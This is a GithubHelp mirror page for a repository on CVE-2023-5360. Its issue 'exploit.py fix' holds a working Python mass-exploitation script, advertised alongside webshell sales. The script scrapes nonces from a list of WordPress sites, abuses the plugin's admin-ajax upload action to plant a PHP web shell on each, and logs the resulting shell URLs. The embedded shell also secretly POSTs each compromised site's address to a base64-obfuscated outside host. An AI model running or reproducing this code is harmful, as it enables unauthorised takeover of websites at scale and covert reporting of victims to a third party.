GithubHelp home page GithubHelp logo

cve-2023-5360's People

Contributors

sagsooz avatar

Stargazers

avatar avatar

Watchers

avatar

Forkers

im-hanzou sonofescobar1337 fffflll

cve-2023-5360's Issues

exploit.py fix

from bs4 import BeautifulSoup
import re
import requests
import json
from concurrent.futures import ThreadPoolExecutor
from art import *
art_text = "CVE-2023-5360"
ascii_art = text2art(art_text,chr_ignore=True)
print(ascii_art)
print("Telegram : @public_html | Sale Webshells And Exploits")

sites = input("List : ")
with open(sites, "r") as file:
urls = file.read().splitlines()
num_threads = int(input("Threads: "))
def process_url(url):
response = requests.get(url)
html_content = response.text

soup = BeautifulSoup(html_content, 'html.parser')

script_pattern = re.compile(r'var WprConfig = \{[^}]+\};', re.DOTALL)
match = re.search(script_pattern, str(soup))
if match:
    javascript_code = match.group()

    nonce_pattern = r'"nonce":"([a-f0-9]+)"'
    nonce_match = re.search(nonce_pattern, javascript_code)

    if nonce_match:
        nonce_value = nonce_match.group(1)
        print(f"Nonce value for {url}: {nonce_value}")
    else:
        print(f"Nonce value not found for {url}.")
else:
    print(f"JavaScript code containing 'var WprConfig' not found for {url}.")

urlf = url + "/wp-admin/admin-ajax.php"
nonce = {nonce_value}
file_content = """
<?php
echo '<title>! Uploader !</title>';
echo '<center><b><font face="Courier new" color="black" size="6">| Uploader |</b></font><br>';
echo "<b>".php_uname()."</b><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
else { echo '<b>Not uploaded ! </b><br><br>';}
}
$k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw');
$cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$data = array('file_url' => $cur);
$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => http_build_query($data),
    ),
);
$context = stream_context_create($options);
$result = file_get_contents($k3yw, false, $context);
?>
"""

data = {"action": "wpr_addons_upload_file", "triggering_event": "click", "allowed_file_types": "php!",
        "wpr_addons_nonce": nonce}
resp = requests.post(url=urlf, data=data, files={"uploaded_file": ("mRz.php!", file_content, "text/php")})
with open("suc.txt", "a") as suc:
    suc.write(json.loads(resp.text)["data"].get('url') + "\n")
print(f"Shell URL for {url}: {json.loads(resp.text)['data'].get('url')}")

with ThreadPoolExecutor(max_workers=num_threads) as executor:
executor.map(process_url, urls)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.